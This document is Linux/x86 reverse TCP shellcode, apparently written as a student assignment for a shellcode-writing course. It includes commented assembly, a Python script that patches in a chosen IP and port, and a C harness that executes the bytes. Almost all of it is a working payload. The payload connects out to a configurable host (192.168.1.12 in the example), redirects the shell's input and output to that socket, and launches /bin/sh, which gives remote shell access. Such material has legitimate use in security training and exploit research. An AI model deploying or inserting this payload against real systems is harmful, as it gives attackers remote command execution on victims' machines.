114 bytes small Linux/x86 reverse TCP shellcode.
736ab2fee6b1fc77956e403631161630
; Title: Linux/x86 - Reverse TCP Shellcode ( 114 bytes )
; Author: Stylianos Voukatas
; Website: https://vostdev.wordpress.com/
; Date: 2020-12-30
; Tested on: Linux ubuntu 5.4.0-42-generic #46~18.04.1-Ubuntu x86_64
;
; Purpose: Assignment 2 for SLAE
; SLAE: http://securitytube-training.com/onlinecourses/securitytube-linux-assembly-expert/
; Student ID: PA-27669
;
; Shellcode-length: 114
;-------------------------------------- ASM --------------------------------------
global _start
section .text
_start:
; set registers to zero
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
;socket section
mov ax, 0x167 ; set num for socket interrupt
mov bl, 0x02 ; set domain IPv4 Protocol, try also 0x00 for both v4 and v6, also one less instruction
mov cl, 0x01 ; set type
; edx is zero ; set protocol, leave it 0 so it will select on its own based on the type
int 0x80 ; interrupt for socket()
; eax will hold our file descriptor (fd)
mov esi, eax ; store fd
; connect section
; construct the struct sockaddr_in
; prepare eax for ip addr XOR, set a mask
mov eax, 0xffffffff
push edx ; padding 4 bytes
push edx ; padding 4 bytes
; address 192.168.1.12 is in little endian 0xc01a8c0
; we XOR the address using a mask of 0xffffffff and we get 0xf3fe573f
; in order to restore the initial value we need to XOR again with the mask
; this is done to avoid null characters in case our ip addr contain 0
xor eax, 0xf3fe573f
push eax ; address field, set to 192.168.1.12, in little endian format
; same convertion for the port number
mov eax, 0xffffffff
xor ax, 0xc6fa ; port number 1337 after mask applied in little endian
push ax
push word 0x02 ; address family
mov ecx, esp ; save the struct address in stack
mov dl, 0x10 ; size of struct, 16 bytes (padding + address + port + family)
mov ebx, esi ; set fd
xor eax, eax
mov ax, 0x016a ; set num for bind interrupt
int 0x80
; check if connect succeed
test eax, eax ; if not zero then an error occured
jnz exit
; dup2 section
xor ecx, ecx
mov cl, 0x3 ; prepare for loop
xor eax, eax
dup_loop:
; ebx has the fd from the previous call
; duplicate fd for stdin, stdout, stderr
mov al, 0x3f
dec cl
int 0x80
jnz dup_loop
; execve section
xor eax, eax
push eax ; push \0 in stack
; /bin//sh
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax ; push 0 in stack
mov edx, esp
push ebp ; push the address of /bin//sh in stack
mov ecx, esp ; put the address of args in ecx
mov al, 0xb
int 0x80
exit:
xor eax, eax
xor ebx, ebx
mov al, 0x01
mov bl, 0x07 ; just a random number as an exit code :)
int 0x80
;-------------------------------------- ASM --------------------------------------
Script to automaticaly produce the shellcode, set ip and port
;-------------------------------------- Python -----------------------------------
#!/usr/bin/python
from operator import xor
# set ip and port
ip = "192.168.1.12"
#port = "31337"
#ip = '127.0.0.1'
port = '8888'
ip_in_xored_bytes = ''
port_in_xored_bytes = ''
shell_code_1 = "\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc6\\xb8\\xff\\xff\\xff\\xff\\x52\\x52\\x35"
#ip
shell_code_2 = "\\x50\\xb8\\xff\\xff\\xff\\xff\\x66\\x35"
#port
shell_code_3 = "\\x66\\x50\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\x89\\xf3\\x31\\xc0\\x66\\xb8\\x6a\\x01\\xcd\\x80\\x85\\xc0\\x75\\x27\\x31\\xc9\\xb1\\x03\\x31\\xc0\\xb0\\x3f\\xfe\\xc9\\xcd\\x80\\x75\\xf8\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x55\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xb3\\x07\\xcd\\x80"
for byte in ip.split("."):
ip_in_xored_bytes += "\\x" + "{:x}".format(xor(int(byte),0xff))
port_in_xored_bytes += "{:04x}".format(xor(int(port),0xffff))
port_xored_formated = "\\x" + port_in_xored_bytes[:2] + "\\x" + port_in_xored_bytes[2:]
print "ip:", ip
print "xored ip: ", ip_in_xored_bytes
print "port:", port
print "xored port: ", port_xored_formated
print ""
shell_code = shell_code_1 + ip_in_xored_bytes + shell_code_2 + port_xored_formated + shell_code_3
print "ShellCode:"
print shell_code
;-------------------------------------- Python ------------------------------------
C program to test the payload
gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32
;-------------------------------------- Paylod test -------------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc6\xb8\xff\xff\xff\xff\x52\x52\x35\x3f\x57\xfe\xf3\x50\xb8\xff\xff\xff\xff\x66\x35\xdd\x47\x66\x50\x66\x6a\x02\x89\xe1\xb2\x10\x89\xf3\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x27\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf8\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x55\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x07\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}